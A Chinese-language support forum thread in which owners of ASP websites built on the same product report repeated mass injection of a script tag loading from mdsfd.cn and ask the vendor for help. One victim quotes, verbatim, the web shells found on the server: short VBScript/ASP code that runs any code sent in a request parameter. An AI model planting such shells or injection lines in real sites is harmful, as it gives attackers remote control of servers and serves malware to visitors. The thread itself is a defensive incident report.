代码漏洞问题!!被挂马网站火速集结中……

dongbinghui

我的网站:

ems-rc.com
每个index.asp和js文件都被写入:
<script  src=http://mdsfd.cn></script>
我删除了.过不了多久又没被写入了..

始终要有个解决办法呀..

高手们..管理员..一定要看,解决哦..必竟是个大问题...

管理员：遇到此问题的朋友请将站点日志发上来，请提供站点日志+文件被修改时间以备我们尽快解决此问题。

dongbinghui

自己顶一下啦！！！

admin

这种写入的是入侵者通过木马文件进行的批量挂马,木马的来源不好判断,程序方面木马来源就是通过上传木马文件,普及版已经对上传的文件作了木马文件检测,也就是说不是通过程序里的上传功能放上来的木马,很多朋友说后台备份可以把木马图片还原成木马ASP文件,现在程序上传的部分已经完全闭掉了上传木马伪装图片的可能,所以,后台备份数据库功能是安全的.还有现在很多都通过跨站,直接拿服务器来攻击部分站点,这种情况一般都是虚拟主机空间不是很安全,从这个站点上传了木马可以跨到同服务器其他站点,最终实现攻击到目标攻击的站点.当然这种情况的话,那就算你的网站很安全,照样会被批量挂马.
楼主可以检查一下程序里边的文件,看有没有可疑的文件,文件大小一般都在70-80K左右,如果有木马文件,可能程序还存在问题,如果没有,就可能是后边的情况,通过别的站点入侵过来的.

dongbinghui

管理员。。我查看了服务器

在DataBase目录下创建了一个inc.asp文件夹。里面创建了一个data.mdb 只有4K。打不开。把后缀改为.asp后，里面写的是：
<script language=VBScript runat=server>if request(chr(35))<>\"\"  then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if
</script>

在admin和webad目录下创建了一个index.的目录，里面是空的。
在more目录下创建了一个inedx.asp文件。里面写的是：<%ExecuteGlobal request(chr(35))%>

如有需要，我可以打包发给你。整站。QQ:5754355

请管理员分析一下是什么原因？到底是程序本身的问题，还是。。。。盼回复！！

嘉缘是个品牌，嘉缘是精益求精的团队。嘉缘会很认真的面对问题的。

muqian

跟你同样的遭遇。几十次之多了，每隔几天就来一次。没有什么办法。都是重传程序。空间商一直说他的服务器设置不会出现跨站攻击的。我换用两家服务器都没有避免被挂马。并且都是这马。这边程序也查不出来源。无奈呀。期待谁有好方法。

dongbinghui

admin还是帮助看一下呀..帮助解决这个问题吧...

谢谢了!!!!


万分感谢!!!

muqian

继续顶，该引起重视了，整天重传程序也不是个办法呀

嘉缘花心

请联系320133806

职业杀手

家园的人呢？？？这是程序的问题   我的网站每天都被挂楼主那样的木马   手法和木马地址一模一样

家园的人不要闭门造车了    你们的程序又被黑客拿下了


赶快想想办法吧   我都快愁死了